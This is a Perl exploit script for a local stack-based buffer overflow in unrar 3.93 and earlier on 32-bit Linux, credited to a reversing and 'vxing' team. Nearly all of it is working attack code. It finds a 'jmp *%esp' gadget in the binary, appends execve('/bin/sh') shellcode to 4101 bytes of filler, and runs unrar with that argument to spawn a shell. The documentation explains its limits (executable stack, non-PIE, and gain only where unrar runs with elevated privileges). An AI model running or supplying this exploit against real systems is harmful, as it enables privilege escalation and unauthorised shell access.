#!/usr/bin/perl
=head1 NAME

WinRAR/unrar <= 3.93 -- local stack-based buffer overflow exploit (Linux unrar binary)
=head2 DESCRIPTION

This script triggers a stack-based buffer overflow in unrar, the popular Linux
port of the WinRAR extractor, by running it with an over-long command-line
switch. The argument is filler up to the saved return address, followed by the
address of a C<jmp *%esp> gadget taken from the unrar binary itself, followed by
an execve("/bin/sh") shellcode that ends up on the stack.

It was not developed to bypass non-executable-stack protections: it needs a
target whose stack is executable, and because the gadget address is read from the
on-disk binary it also assumes a non-PIE build (with PIE/ASLR the objdump address
is not the runtime address). It is a local exploit -- the shell it spawns runs
with the privileges of whoever runs unrar, so it only gains anything where unrar
is invoked with higher privileges than the caller (setuid, a wrapper, ...).

Have phun
=head2 AUTHORS
ZadYree ~~ 3LRVS Team - Low Level Languages Reversing Vxing Security
=head2 TESTED ON

Linux Debian 6, 32-bit x86 build of unrar (the exploit is i386-specific: a
4-byte little-endian return address, C<%esp>, and an C<int 0x80> shellcode).
May work on FreeBSD, but the bundled shellcode uses Linux syscall conventions
(execve via C<int 0x80> with eax = 0x0b), so a FreeBSD shellcode would have to
be substituted; the padding length (see C<BUFF>) is also specific to the tested
build.
=head3 THANKS

kmkz

regol

hellpast

Hebiko

m_101

ZadYree

SNCF

The one who sent me that locked .rar
=cut
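use 5.010;
use strict;
use warnings;

# Shellcode: execve("/bin/sh") => http://www.shell-storm.org/shellcode/files/shellcode-752.php
# Linux/i386, 21 bytes: xor ecx,ecx; mul ecx; push ecx; push "//sh"; push "/bin";
# mov ebx,esp; mov al,0x0b; int 0x80.  It must stay NUL-free because the whole
# payload travels as one argv[] entry, i.e. a C string (see exec() below).
use constant SHELLCODE => "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" .
                          "\x73\x68\x68\x2f\x62\x69\x6e\x89" .
                          "\xe3\xb0\x0b\xcd\x80";

# Filler that reaches the saved return address: the leading '-' makes unrar treat
# the argument as a switch, then 820 * 5 = 4100 bytes of padding.  The resulting
# 4101-byte offset is specific to the build this was tested against.
use constant BUFF => ('-' . ('3lrvs' x 820));

# Target binary.  An optional first argument overrides the default so the script
# can be pointed at another install; the path is never handed to a shell.
my $pname = $ARGV[0] // "/usr/bin/unrar";

die "[-]File $pname does not exist!\012" unless (-e $pname);

say "[*]Looking for jmp *%esp gadget...";

# Disassemble through a pipe in list form (no shell, no quoting issues) and take
# the first "jmp *%esp" (encoded ff e4) whose address contains no NUL byte: the
# address is embedded in argv[], so a NUL would truncate the payload.  The
# address is the one objdump prints, which is only the runtime address for a
# non-PIE binary.  -D walks every section; on an NX-enforcing kernel only gadgets
# in executable sections are usable, but this exploit already needs an executable
# stack, so the wider search of the original is kept.
open my $dis, '-|', 'objdump', '-D', $pname
    or die "[-]Cannot run objdump on $pname: $!\012";

my $esp;
GADGET: while (my $line = <$dis>) {
    next GADGET
        unless $line =~ m{ \A \s* (?<addr>[0-9a-f]+) : \s+ ff \s+ e4 \s+ jmp \s+ \*%esp }xms;
    my $addr = hex $+{addr};
    # Skip addresses that would put a NUL inside the 4 little-endian bytes.
    next GADGET if pack("V", $addr) =~ m{\0}xms;
    $esp = $addr;
    last GADGET;
}
# Not checked: leaving the loop early makes objdump exit on SIGPIPE, which is fine.
close $dis;

# Previously a missing gadget silently became address 0 and the exploit ran anyway.
die "[-]No usable jmp *%esp gadget found in $pname\012" unless defined $esp;

# '$esp' is single-quoted on purpose: it names the register, not the variable.
say sprintf('[+]Jump to $esp found! (0x%08x)', $esp), "\012[+]Now exploiting...";

sleep(1);

# argv[1] = filler + little-endian gadget address + shellcode.  The trailing
# newline is kept from the original payload (presumably harmless to unrar's
# switch parser).  exec() only returns on failure.
my @payload = ($pname, (BUFF . pack("V", $esp) . SHELLCODE . "\012"));

exec(@payload) or die "[-]exec $pname failed: $!\012";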